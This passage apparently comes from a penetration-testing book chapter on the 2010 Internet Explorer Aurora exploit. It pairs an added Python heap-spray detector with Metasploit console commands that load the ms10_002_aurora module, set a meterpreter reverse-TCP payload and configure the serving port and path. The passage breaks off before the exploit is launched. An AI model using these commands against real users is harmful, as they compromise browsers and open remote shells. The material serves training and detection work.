
Chapter 8

Exploring the Internet Explorer Aurora Exploit

You know the basics of how heap sprays work and how you can dynamically 
allocate memory and fill the heap up with NOPs and shellcode. We’ll be 
leveraging an exploit that uses this technique and something found in nearly 
every client-side exploit. The browser exploit of choice here is the Aurora 
exploit (Microsoft Security Bulletin MS10-002). Aurora was most notoriously 
used in the attacks against Google and more than 20 other large technology 
companies. Although this exploit was released in early 2010, it particularly 
resonates with us because it took down some major players in the technology 
industry.
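As an added defender-side example (not from the book and not part of the Metasploit module), the following heuristic scans page content for the heap-spray building blocks just described: a repeated-unit NOP sled built with unescape(), a string that doubles itself until it is large, and a loop that stores many copies into an array. The two sample pages, the placeholder payload bytes and the SLED_UNITS list are constructed for the example.

```python
import re

# Constructed samples (not from the book): a benign page and one showing the
# "fill the heap with a NOP sled plus payload" pattern the chapter describes.
BENIGN_HTML = ('<html><script>var s = unescape("%u0041%u0042");'
               'document.write(s);</script></html>')
SPRAY_HTML = ('<html><script>'
              'var nop = unescape("%u0c0c%u0c0c");'                 # sled filler
              'var code = unescape("%u4141%u4242%u4343");'          # placeholder bytes, not a payload
              'while (nop.length < 0x100000) nop += nop;'           # self-doubling until ~1 MB
              'var blocks = new Array();'
              'for (var i = 0; i < 200; i++) blocks[i] = nop + code;'  # many copies on the heap
              '</script></html>')

# Hypothetical starter list of 16-bit filler units commonly used as sled bytes.
SLED_UNITS = {"0c0c", "0d0d", "9090", "0a0a", "0b0b"}

UNESCAPE_RE = re.compile(r'unescape\(\s*["\']((?:%u[0-9a-fA-F]{4})+)["\']\s*\)')
DOUBLING_RE = re.compile(r'while\s*\(\s*(\w+)\.length\s*<\s*(0x[0-9a-fA-F]+|\d+)\s*\)\s*\1\s*\+=\s*\1\b')
FILL_RE = re.compile(r'for\s*\(\s*var\s+(\w+)\s*=\s*0\s*;\s*\1\s*<\s*(\d+)\s*;[^)]*\)\s*\w+\[\1\]\s*=')


def find_sleds(script):
    """unescape() literals made of one repeated unit (a sled such as 0c0c0c0c...)."""
    hits = []
    for m in UNESCAPE_RE.finditer(script):
        units = [u.lower() for u in re.findall(r'%u([0-9a-fA-F]{4})', m.group(1))]
        # Short repeats of ordinary characters are common; require a known unit or a long run.
        if len(set(units)) == 1 and (units[0] in SLED_UNITS or len(units) >= 8):
            hits.append(units[0])
    return hits


def find_doubling_loops(script, min_target=0x10000):
    """while (x.length < N) x += x; loops that grow a string to a large size."""
    return [(m.group(1), int(m.group(2), 0)) for m in DOUBLING_RE.finditer(script)
            if int(m.group(2), 0) >= min_target]


def find_fill_loops(script, min_iters=50):
    """for-loops that store many copies into an array (the spray itself)."""
    return [(m.group(1), int(m.group(2))) for m in FILL_RE.finditer(script)
            if int(m.group(2)) >= min_iters]


def analyze(html):
    """Return (rule, detail) indicators found; all three together is a strong signal."""
    findings = []
    findings += [("nop_sled", u) for u in find_sleds(html)]
    findings += [("doubling_loop", d) for d in find_doubling_loops(html)]
    findings += [("array_fill", f) for f in find_fill_loops(html)]
    return findings
```

Any one indicator alone is weak evidence; treat the combination, or a known sled unit plus a large-size loop, as the trigger for further inspection.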

We’ll start by using the Aurora Metasploit module and then set our payload. The following commands should be familiar, because we have used them in previous chapters. You’ll also see a couple of new options that we’ll discuss in a bit.

msf > use windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_002_aurora) > show options

Module options:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     0.0.0.0          yes       The local host to listen on.
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST                      yes       The local address
   LPORT     4444             yes       The local port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(ms10_002_aurora) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms10_002_aurora) > set URIPATH /
URIPATH => /